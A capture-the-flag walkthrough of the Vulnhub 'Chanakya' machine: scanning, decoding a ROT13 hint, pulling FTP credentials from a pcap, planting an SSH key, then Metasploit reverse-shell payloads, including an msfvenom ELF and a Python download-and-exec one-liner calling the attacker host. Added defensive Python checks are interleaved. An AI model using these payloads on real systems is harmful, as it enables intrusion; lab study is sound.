Vulnhub: Detailed Walkthrough of the Chanakya Machine

Chanakya

Identifying the target host's IP address

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# netdiscover -i eth1 -r 192.168.187.0/24   
Currently scanning: 192.168.187.0/24   |   Screen View: Unique Hosts                                                                    
                                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      1      60  VMware, Inc.                                                                          
 192.168.187.137 00:0c:29:b9:eb:f5      1      60  VMware, Inc.                                                                          
 192.168.187.254 00:50:56:ef:2f:9e      1      60  VMware, Inc.       

Using Netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.187.137.

Nmap scan

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# nmap -sS -sV -sC -p- 192.168.187.137 -oN nmap_full_scan                                                                         130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 22:37 EST
Nmap scan report for bogon (192.168.187.137)
Host is up (0.00071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.0.0 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.187.137:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fd:4b:52:55:c2:41:5f:51:a4:5d:90:5b:be:17:0d:13 (RSA)
|   256 f1:98:34:0a:43:97:6d:c7:e0:78:d3:23:e0:4e:18:11 (ECDSA)
|_  256 9d:eb:79:af:59:c0:bb:c2:4a:e3:00:7c:05:62:48:30 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Chanakya
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:B9:EB:F5 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds

Getting a shell

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137      
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): anonymous
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
                                                                                                                                          
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# searchsploit pyftpdlib                    
Exploits: No Results
Shellcodes: No Results

  1. The target FTP server does not allow anonymous access.

  2. No exploitable vulnerability is known for the FTP service (searchsploit returns nothing for pyftpdlib).

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# nikto -h http://192.168.187.137                        
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.137
+ Target Hostname:    192.168.187.137
+ Target Port:        80
+ Start Time:         2023-02-12 22:44:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 94e, size: 596965271be00, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-02-12 22:45:17 (GMT-5) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# gobuster dir -u http://192.168.187.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh      
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.187.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/02/12 22:46:21 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.187.137/images/]
/index.html           (Status: 200) [Size: 2382]                                    
/assets               (Status: 301) [Size: 319] [--> http://192.168.187.137/assets/]
/personal.html        (Status: 200) [Size: 1175]                                    
/work.html            (Status: 200) [Size: 1400]                                    
/facts.html           (Status: 200) [Size: 899]                                     
/abuse.txt            (Status: 200) [Size: 14]                                      
/legacy.html          (Status: 200) [Size: 1423]                                    
/child.html           (Status: 200) [Size: 1508]                                    
/major.html           (Status: 200) [Size: 1243]                                    
/late.html            (Status: 200) [Size: 3214]                                    
/server-status        (Status: 403) [Size: 280]                                     
                                                                                    
===============================================================
2023/02/12 22:49:00 Finished
===============================================================

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# curl http://192.168.187.137/abuse.txt 
nfubxn.cpncat

Could this be a domain name? Let's try it and see.

First, check whether there are any subdomains.

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# wfuzz -u http://nfubxn.cpncat -H "Host:FUZZ.nfubxn.cpncat" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 161
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://nfubxn.cpncat/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                  
=====================================================================

000000689:   400        12 L     53 W       422 Ch      "gc._msdcs"                                                              
000010581:   400        12 L     53 W       422 Ch      "#mail"                                                                  
000009532:   400        12 L     53 W       422 Ch      "#www"                                                                   
000019834:   400        12 L     53 W       422 Ch      "_domainkey"                                                             
000042729:   400        12 L     53 W       422 Ch      "mailing._domainkey.sunnynews"                                           
000042737:   400        12 L     53 W       422 Ch      "mailing._domainkey.info"                                                
000047706:   400        12 L     53 W       422 Ch      "#smtp"                                                                  
000048726:   400        12 L     53 W       422 Ch      "hallam_dev"                                                             
000048728:   400        12 L     53 W       422 Ch      "hallam_ad"                                                              
000052040:   400        12 L     53 W       422 Ch      "wm_j_b__ruffin"                                                         
000075231:   400        12 L     53 W       422 Ch      "2609_n_www"                                                             
000075235:   400        12 L     53 W       422 Ch      "0907_n_hn.m"                                                            
000088990:   400        12 L     53 W       422 Ch      "faitspare_mbp.cit"                                                      
000091135:   400        12 L     53 W       422 Ch      "sb_0601388345bc450b"                                                    
000091134:   400        12 L     53 W       422 Ch      "sb_0601388345bc6cd8"                                                    
000103135:   400        12 L     53 W       422 Ch      "#pop3"                                                                  
000104844:   400        12 L     53 W       422 Ch      "api_web_dev"                                                            
000104922:   400        12 L     53 W       422 Ch      "api_webi_dev"                                                           
000104819:   400        12 L     53 W       422 Ch      "api_portal_dev"                                                         
000112922:   400        12 L     53 W       422 Ch      "sklep_test"                                                             
000075253:   400        12 L     53 W       422 Ch      "0507_n_hn"                                                              

Total time: 130.0142
Processed Requests: 114441
Filtered Requests: 114420
Requests/sec.: 880.2185

No subdomains were found by brute force; is this the wrong direction?

Looking at other people's solutions: nfubxn.cpncat is not a domain name but a ROT13-encoded string.

Decoding it (with the CyberChef website) gives: ashoka.pcapng
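The decoding step above is the pivot of this box, so here is a small Python example (added to this walkthrough, not the author's code) that does the ROT13 decode and, more generally, tries all 26 Caesar shifts and ranks them by whether the result ends in a recognizable file extension. The extension list is an assumption chosen for this demonstration; the only input taken from the page is the token nfubxn.cpncat.

```python
import string

# Assumed list of extensions worth recognizing; extend as needed.
KNOWN_EXTENSIONS = {"pcap", "pcapng", "txt", "zip", "php", "html", "sh", "log"}


def caesar_shift(text: str, shift: int) -> str:
    """Shift every ASCII letter by `shift` positions, preserving case.
    Digits, dots and other characters are left untouched."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13 is the Caesar shift by 13; applying it twice restores the input."""
    return caesar_shift(text, 13)


def rank_shifts(token: str):
    """Try all 26 shifts and score each candidate: 1 if the part after the last
    dot is a known file extension, else 0. Returns (score, shift, plaintext)
    tuples, best first (ties broken by the smaller shift)."""
    candidates = []
    for shift in range(26):
        plain = caesar_shift(token, shift)
        ext = plain.rsplit(".", 1)[-1].lower() if "." in plain else ""
        score = 1 if ext in KNOWN_EXTENSIONS else 0
        candidates.append((score, shift, plain))
    candidates.sort(key=lambda c: (-c[0], c[1]))
    return candidates


def best_decoding(token: str):
    """Return (shift, plaintext) for the top-ranked candidate, or None when no
    shift yields a recognizable filename (e.g. the token really is a hostname)."""
    score, shift, plain = rank_shifts(token)[0]
    return (shift, plain) if score > 0 else None


if __name__ == "__main__":
    token = "nfubxn.cpncat"          # value found in /abuse.txt on the target
    print(rot13(token))              # ashoka.pcapng
    print(best_decoding(token))      # (13, 'ashoka.pcapng')
    print(best_decoding("example.com"))  # None: looks like a real hostname
```

Running best_decoding on a token before spending two minutes of wfuzz on it would have settled the domain-versus-encoding question immediately.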

Analyzing the file with Wireshark reveals the FTP username and password:

ashoka:kautilya
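What Wireshark shows here is the FTP control channel carrying the login in cleartext. The following Python example (added here, not part of the original walkthrough) is the defender's side of the same observation: a parser for FTP control-channel text, as exported by "Follow TCP Stream" or a tshark export, that pairs each USER/PASS exchange with the server's reply code and reports cleartext credential exposure with the password masked. The two sample streams are constructed for this example, modelled on the server banners shown on this page; they are not taken from ashoka.pcapng.

```python
import re
from dataclasses import dataclass

# Constructed sample: a successful login as it would appear in a followed TCP stream.
SAMPLE_STREAM = """220 pyftpdlib based ftpd ready.
USER ashoka
331 Username ok, send password.
PASS kautilya
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/" is the current directory.
QUIT
221 Goodbye.
"""

# Constructed sample: the rejected anonymous attempt, mirroring the 530 reply seen above.
SAMPLE_FAILED = """220 pyftpdlib based ftpd ready.
USER anonymous
331 Username ok, send password.
PASS guest@example.com
530 Anonymous access not allowed.
"""

CLIENT_CMD = re.compile(r"^(USER|PASS)\s+(.*)$", re.IGNORECASE)
SERVER_REPLY = re.compile(r"^(\d{3})[ -]")


@dataclass
class FtpLogin:
    user: str
    password: str
    success: bool  # True when the reply to PASS was 230


def extract_ftp_logins(stream: str):
    """Walk the control channel line by line. A USER command opens a pending
    login, PASS supplies the secret, and the next 3-digit server reply closes
    it: 230 means the cleartext credential actually worked."""
    logins = []
    pending_user = None
    pending_pass = None
    for raw in stream.splitlines():
        line = raw.strip()
        m = CLIENT_CMD.match(line)
        if m:
            cmd, arg = m.group(1).upper(), m.group(2).strip()
            if cmd == "USER":
                pending_user, pending_pass = arg, None
            elif cmd == "PASS":
                pending_pass = arg
            continue
        r = SERVER_REPLY.match(line)
        if r and pending_user is not None and pending_pass is not None:
            code = int(r.group(1))
            logins.append(FtpLogin(pending_user, pending_pass, success=(code == 230)))
            pending_user = pending_pass = None
    return logins


def report(logins):
    """Render findings without echoing the secret: that it was visible at all is the finding."""
    lines = []
    for login in logins:
        outcome = "succeeded" if login.success else "failed"
        lines.append(
            f"cleartext FTP credential for user '{login.user}' "
            f"({len(login.password)} chars, login {outcome})"
        )
    return lines


if __name__ == "__main__":
    for line in report(extract_ftp_logins(SAMPLE_STREAM) + extract_ftp_logins(SAMPLE_FAILED)):
        print(line)
```

Any capture of plain FTP on a monitored segment will trigger this; the fix is not a better detector but moving the service to SFTP or FTPS so the control channel is encrypted.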

Log in to FTP with these credentials:

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> pwd
257 "/" is the current directory.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-------   1 ashoka   ashoka          1 Nov 05  2019 .bash_history
-rw-r--r--   1 ashoka   ashoka        220 Nov 05  2019 .bash_logout
-rw-r--r--   1 ashoka   ashoka       3771 Nov 05  2019 .bashrc
drwx------   2 ashoka   ashoka       4096 Nov 05  2019 .cache
drwxrwxr-x   3 ashoka   ashoka       4096 Nov 05  2019 .local
-rw-r--r--   1 ashoka   ashoka        807 Nov 05  2019 .profile
226 Transfer complete.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1 bytes received in 0.00 secs (1.6195 kB/s)
ftp> cd /var
550 No such file or directory.
ftp> put test.txt
local: test.txt remote: test.txt
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
12 bytes sent in 0.00 secs (113.7743 kB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-------   1 ashoka   ashoka          1 Nov 05  2019 .bash_history
-rw-r--r--   1 ashoka   ashoka        220 Nov 05  2019 .bash_logout
-rw-r--r--   1 ashoka   ashoka       3771 Nov 05  2019 .bashrc
drwx------   2 ashoka   ashoka       4096 Nov 05  2019 .cache
drwxrwxr-x   3 ashoka   ashoka       4096 Nov 05  2019 .local
-rw-r--r--   1 ashoka   ashoka        807 Nov 05  2019 .profile
-rw-r--r--   1 root     root           12 Feb 13 04:09 test.txt
226 Transfer complete.
ftp> 

File upload works, so the next step is to upload an SSH public key to the target server.

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:o3qqxP2XtfrtTqjSSy4k1Ikh5+xRym+dW4MT2aWLHqo root@kali
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|  . o .     .    |
|   * * . o o     |
|    O o o o      |
|   o o .S= .     |
| . .o +.B.=.     |
|  o .+.+.B.o.    |
| .   o=o*..o     |
|  ..E+.+=+.o+    |
+----[SHA256]-----+
                                                                                                                                          
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root    1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root   12 Feb 12 23:09 test.txt
                                                                                                                                          
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# cp ~/root/.ssh/id_rsa.pub .
cp: cannot stat '/root/root/.ssh/id_rsa.pub': No such file or directory
                                                                                                                                          
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# cd ~/                                                                                                                             1 ⨯
                                                                                                                                          
┌──(root💀kali)-[~]
└─# ls     
Desktop    Downloads  geckodriver  Music                 Network_Services  Public                           Templates  tryhackme  Vulnhub
Documents  dvwa       go           NetfilterQueue-1.0.0  Pictures          starting_point_jasonhuawen.ovpn  Toolsets   Videos
                                                                                                                                          
┌──(root💀kali)-[~]
└─# cd .ssh
                                                                                                                                          
┌──(root💀kali)-[~/.ssh]
└─# ls -alh
total 4.4M
drwx------  2 root root 4.0K Feb 12 23:11 .
drwx------ 42 root root 4.0K Feb 12 23:08 ..
-rw-------  1 root root 2.6K Feb 12 23:11 id_rsa
-rw-r--r--  1 root root  563 Feb 12 23:11 id_rsa.pub
-rw-------  1 root root 2.2M Feb 12 21:28 known_hosts
-rw-------  1 root root 2.2M Jun 24  2022 known_hosts.old
                                                                                                                                          
┌──(root💀kali)-[~/.ssh]
└─# cp id_rsa.pub ~/Vulnhub/chanakya 
                                                                                                                                          
┌──(root💀kali)-[~/.ssh]
└─# cp id_rsa ~/Vulnhub/chanakya          
                                                                                                                                          
┌──(root💀kali)-[~/.ssh]
└─# cd ~/Vulnhub/chanakya       
                                                                                                                                          
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 128K
drwxr-xr-x 2 root root 4.0K Feb 12 23:12 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root    1 Feb 12 23:08 .bash_history
-rw------- 1 root root 2.6K Feb 12 23:12 id_rsa
-rw-r--r-- 1 root root  563 Feb 12 23:12 id_rsa.pub
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root   12 Feb 12 23:09 test.txt

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-------   1 ashoka   ashoka          1 Nov 05  2019 .bash_history
-rw-r--r--   1 ashoka   ashoka        220 Nov 05  2019 .bash_logout
-rw-r--r--   1 ashoka   ashoka       3771 Nov 05  2019 .bashrc
drwx------   2 ashoka   ashoka       4096 Nov 05  2019 .cache
drwxrwxr-x   3 ashoka   ashoka       4096 Nov 05  2019 .local
-rw-r--r--   1 ashoka   ashoka        807 Nov 05  2019 .profile
-rw-r--r--   1 root     root           12 Feb 13 04:09 test.txt
226 Transfer complete.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (8.3894 MB/s)
ftp> 

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh -i id_rsa ashoka@192.168.187.137
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Tue Nov  5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
ashoka@ubuntu:~$ 
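The key-based login above worked because the FTP service exposed ashoka's real home directory with write permission, so an authorized_keys file could be dropped into it. Note from the earlier listing that the uploaded test.txt appeared as root:root, i.e. the FTP daemon writes files as root. The Python example below (added to this walkthrough, not the author's or the box's code) is the matching host-side check a defender would run: it computes the OpenSSH-style SHA256 fingerprint of each authorized_keys entry, compares it against an allowlist, and flags unexpected file ownership or loose permissions. The home directory, the key blobs and the allowlist are all constructed for the demo; the blobs follow the ssh-ed25519 wire layout but are not real keys.

```python
import base64
import hashlib
import os
import stat
import tempfile
from pathlib import Path

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-", "sk-")


def ssh_fingerprint(entry: str) -> str:
    """OpenSSH-style SHA256 fingerprint of one authorized_keys line: base64 of
    SHA-256 over the decoded key blob, with '=' padding stripped. A leading
    options field (e.g. 'no-pty') is skipped by looking for the key-type token."""
    parts = entry.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.startswith(KEY_TYPES):
            digest = hashlib.sha256(base64.b64decode(parts[i + 1])).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError(f"no key-type token in: {entry!r}")


def audit_authorized_keys(home: Path, expected_uid: int, allowlist: set) -> list:
    """Return findings for <home>/.ssh/authorized_keys: owner differing from the
    account, group/world write bits, and any key not in the allowlist."""
    findings = []
    ak = home / ".ssh" / "authorized_keys"
    if not ak.is_file():
        return findings
    st = ak.stat()
    # A file written by a daemon running as root shows up owned by uid 0 instead
    # of the account owner (the FTP-uploaded test.txt on this box was root:root).
    # sshd's StrictModes still accepts root-owned files, so treat this as an
    # anomaly indicator rather than something sshd would reject.
    if st.st_uid != expected_uid:
        findings.append(f"{ak}: owner uid {st.st_uid} differs from account uid {expected_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{ak}: group- or world-writable")
    for lineno, line in enumerate(ak.read_text().splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp not in allowlist:
            comment = line.split()[-1] if len(line.split()) >= 3 else "(no comment)"
            findings.append(f"{ak}:{lineno}: key {fp} [{comment}] not in allowlist")
    return findings


def _constructed_entry(key_type: bytes, material: bytes, comment: str) -> str:
    """Build a syntactically valid authorized_keys line from constructed bytes.
    Layout: length-prefixed type string, length-prefixed key bytes (ssh-ed25519
    wire format), base64-encoded. The material is a placeholder, not a real key."""
    blob = (len(key_type).to_bytes(4, "big") + key_type
            + len(material).to_bytes(4, "big") + material)
    return f"{key_type.decode()} {base64.b64encode(blob).decode()} {comment}"


def demo() -> list:
    """Constructed home directory with one approved and one unknown key; returns the findings."""
    approved = _constructed_entry(b"ssh-ed25519", b"\x01" * 32, "constructed-approved-key")
    unknown = _constructed_entry(b"ssh-ed25519", b"\x02" * 32, "constructed-unknown-key")
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "ashoka"
        (home / ".ssh").mkdir(parents=True)
        ak = home / ".ssh" / "authorized_keys"
        ak.write_text(approved + "\n" + unknown + "\n")
        ak.chmod(0o600)
        allowlist = {ssh_fingerprint(approved)}
        return audit_authorized_keys(home, os.getuid(), allowlist)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against every entry in /etc/passwd with an inventory of approved fingerprints, this turns the trick the writeup relies on into a single alert; the configuration fix is to stop exposing users' real home directories through the FTP server and to jail uploads to a directory sshd never reads.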

                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.187.130 LPORT=9999 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls
ashoka.pcapng    chanakya-web  id_rsa      linpeas.sh      shell.elf
authorized_keys  cha.zip       id_rsa.pub  nmap_full_scan  test.txt

Download the ELF file to the target machine:

ashoka@ubuntu:/var$ cd /tmp
ashoka@ubuntu:/tmp$ wget http://192.168.187.130:8000/shell.elf
--2023-02-12 21:13:45--  http://192.168.187.130:8000/shell.elf
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘shell.elf’

shell.elf                    100%[=============================================>]     207  --.-KB/s    in 0s      

2023-02-12 21:13:45 (40.1 MB/s) - ‘shell.elf’ saved [207/207]

ashoka@ubuntu:/tmp$ chmod 777 shell.elf
ashoka@ubuntu:/tmp$ 

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.187.130:9999 

Run shell.elf on the target to get a Meterpreter session on Kali Linux.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.187.137 - Collecting local exploits for x86/linux...
[*] 192.168.187.137 - 39 exploit checks are being tried...
[+] 192.168.187.137 - exploit/linux/local/su_login: The target appears to be vulnerable.
meterpreter > use exploit/linux/local/su_login
Loading extension exploit/linux/local/su_login...
[-] Failed to load extension: i486-linux-musl/exploit/linux/local/su_login not found
meterpreter > 

Execution failed!

msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
                                       on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(multi/script/web_delivery) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/script/web_delivery) > set SRVHOST 192.168.187.130
SRVHOST => 192.168.187.130
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.187.130:6666 
[*] Using URL: http://192.168.187.130:8080/J3YaKcgcgMv
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.187.130:8080/J3YaKcgcgMv', context=ssl._create_unverified_context());exec(r.read());"
msf6 exploit(multi/script/web_delivery) > [*] 192.168.187.137 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.187.137  web_delivery - Delivering Payload (501 bytes)
[*] Sending stage (39704 bytes) to 192.168.187.137
[*] Meterpreter session 2 opened (192.168.187.130:6666 -> 192.168.187.137:59598 ) at 2023-02-13 00:23:41 -0500
sessions

Active sessions
===============

  Id  Name  Type                      Information      Connection
  --  ----  ----                      -----------      ----------
  2         meterpreter python/linux  ashoka @ ubuntu  192.168.187.130:6666 -> 192.168.187.137:59598  (192.168.18
                                                       7.137)

msf6 exploit(multi/script/web_delivery) > get
get   getg  
msf6 exploit(multi/script/web_delivery) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)
msf6 exploit(multi/script/web_delivery) > shell
[-] Unknown command: shell
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                      Information      Connection
  --  ----  ----                      -----------      ----------
  2         meterpreter python/linux  ashoka @ ubuntu  192.168.187.130:6666 -> 192.168.187.137:59598  (192.168.18
                                                       7.137)

msf6 exploit(multi/script/web_delivery) > sessions 2
[*] Starting interaction with 2...

meterpreter > shell
Process 123831 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
$ id
id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
$ exit
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/script/web_delivery) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)
msf6 exploit(multi/script/web_delivery) > pwd
[*] exec: pwd

/root/Vulnhub/chanakya
msf6 exploit(multi/script/web_delivery) > 

Still an unprivileged user. (The `id` typed at the `msf6 exploit(...) >` prompt is executed locally on Kali, as the `[*] exec: id` line shows, which is why it reports root; inside session 2 we are still ashoka.)

msf6 exploit(multi/script/web_delivery) > sessions 

Active sessions
===============

  Id  Name  Type                      Information      Connection
  --  ----  ----                      -----------      ----------
  2         meterpreter python/linux  ashoka @ ubuntu  192.168.187.130:6666 -> 192.168.187.137:59598  (192.168.18
                                                       7.137)

msf6 exploit(multi/script/web_delivery) > use  exploit/unix/local/chkrootkit
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/local/chkrootkit) > show options 

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
